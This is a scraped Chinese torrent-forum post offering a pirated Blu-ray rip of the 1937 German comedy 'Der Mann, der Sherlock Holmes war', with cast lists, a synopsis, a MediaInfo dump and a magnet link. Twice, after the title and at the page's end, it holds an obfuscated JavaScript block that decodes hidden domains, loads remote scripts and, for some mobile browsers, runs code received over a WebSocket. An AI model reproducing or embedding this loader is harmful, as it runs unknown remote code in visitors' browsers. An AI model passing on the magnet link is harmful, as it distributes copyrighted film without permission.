他是福尔摩斯[中文字幕].Two.Merry.Adventurers.1937.1080p.BluRay.x265.10bit.DTS 6.09GB

版主小s 1月前 247

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 他是福尔摩斯 / 那名男子是福尔摩斯 / The Man Who Was Sherlock Holmes(英) / Two Merry Adventurers(美) / Sherlock Holmes(意)

◎片 名 Der Mann, der Sherlock Holmes war

◎年 代 1937

◎产 地 德国

◎类 别 喜剧 / 爱情 / 犯罪

◎语 言 德语

◎上映日期 1937-07-15(德国) / 1937-12-31(美国)

◎IMDb链接 https://www.imdb.com/title/tt0029210/

◎豆瓣链接 https://movie.douban.com/subject/4303686/

◎片 长 112 分钟

◎导 演 卡尔·哈特 Karl Hartl (id:1048683)

◎编 剧 罗伯特·A·施特姆勒 Robert A. Stemmle (id:1022557)

卡尔·哈特 Karl Hartl (id:1048683)

◎演 员 汉斯·阿尔伯斯 Hans Albers (id:1050743)

海因茨·吕曼 Heinz Rühmann (id:1032747)

玛丽路易丝·克劳迪乌斯 Marieluise Claudius (id:1076105)

Willi Schur Willi Schur (id:1138627)

Hans Junkermann Hans Junkermann (id:1113673)

Hansi Knoteck Hansi Knoteck (id:1113332)

埃德温·于尔根森 Edwin Juergenssen (id:1107369)

西格弗雷德·斯楚瑞伯格 Siegfried Schürenberg (id:1017037)

恩斯特·勒加尔 Ernst Legal (id:1106560)

Hans Richter Hans Richter (id:1139852)

F.W. Schr?der-Schrom F.W. Schr?der-Schrom (id:1145892)

沃尔特·维尔纳 Walter Werner (id:1161329)

Ernst Waldow Ernst Waldow (id:1161664)

Erich Walter Erich Walter (id:1161796)

爱德华·冯·温特施泰因 Eduard von Winterstein (id:1162980)

Hilde Weissner Hilde Weissner (id:1163199)

Aribert Grimmer Aribert Grimmer (id:1100305)

Clemens Hasse Clemens Hasse (id:1096029)

Angelo Ferrari Angelo Ferrari (id:1054460)

保罗·比尔特 Paul Bildt (id:1061245)

Horst Birr Horst Birr (id:1061834)

Günther Ballier Günther Ballier (id:1063989)

Ernst Behmer Ernst Behmer (id:1066372)

Gerhard Dammann Gerhard Dammann (id:1075638)

Erich Dunskus Erich Dunskus (id:1085434)

Otto Krieg Helbig Otto Krieg Helbig (id:1091795)

Harry Hardt Harry Hardt (id:1095251)

Heinz Wemper Heinz Wemper (id:1165567)

Hans Sommer Hans Sommer (id:1022547)

費立茲·華格納 Fritz Arno Wagner (id:1038245)

Willy Schiller Willy Schiller (id:1026666)

Otto Hunte Otto Hunte (id:1017315)

Eduard von Borsody Eduard von Borsody (id:1020692)

◎标 签 德国 / 喜剧 / 福尔摩斯 / 歇洛克·福尔摩斯 / 犯罪 / 黑白 / 电影 / 欧洲

◎简 介

Hans Albers and Heinz Rühmann play two confidence tricksters. They manage to stop a night train for nefarious purposes, and impersonate Sherlock Holmes and Dr Watson. Romantic involvement with two young British female travelers ensues, but the plot deepens into the disappearance of rare Mauritius postage stamps which they undertake to recover, in their role as Holmes and Watson...

◎获奖情况 (共1项)

第5届威尼斯电影节 (1937)

墨索里尼杯 最佳国际电影(提名)

└──卡尔·哈特 (id:1048683)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 32380824539580543247163729809092252938 (0x185C51E8EDF658166A38A6E1C8F2150A)

  4. Complete name : [email protected]DDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.08 GiB

  8. Duration : 1 h 51 min

  9. Overall bit rate : 7 807 kb/s

  10. Movie name : Der Mann, der Sherlock Holmes war

  11. Encoded date : UTC 2021-10-18 04:28:19

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 51 min

  23. Bit rate : 7 002 kb/s

  24. Width : 1 480 pixels

  25. Height : 1 080 pixels

  26. Display aspect ratio : 1.370

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.183

  33. Stream size : 5.46 GiB (90%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=26.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1480x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 51 min

  45. Bit rate mode : Constant

  46. Bit rate : 768 kb/s

  47. Channel(s) : 2 channels

  48. Channel layout : L R

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 613 MiB (10%)

  54. Language : German

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4608 (0x1200)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 1 h 50 min

  66. Bit rate : 38.4 kb/s

  67. Count of elements : 2489

  68. Stream size : 30.3 MiB (0%)

  69. Title : chs

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4609 (0x1201)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 50 min

  82. Bit rate : 38.8 kb/s

  83. Count of elements : 2489

  84. Stream size : 30.6 MiB (0%)

  85. Title : cht

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Menu

  91. 00:00:00.000 : en:Chapter 01

  92. 00:08:50.500 : en:Chapter 02

  93. 00:19:40.291 : en:Chapter 03

  94. 00:30:15.166 : en:Chapter 04

  95. 00:44:07.333 : en:Chapter 05

  96. 00:54:07.166 : en:Chapter 06

  97. 01:04:52.333 : en:Chapter 07

  98. 01:14:30.583 : en:Chapter 08

  99. 01:24:35.166 : en:Chapter 09

  100. 01:34:33.583 : en:Chapter 10

  101. 01:45:15.250 : en:Chapter 11


TAGS 犯罪 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:3740DAA1239B3D441351C1602C5CCE68E91FF3FB

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (1)
  • Leon612 1月前
    2
    啥也不说了,感谢楼主分享哇!

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};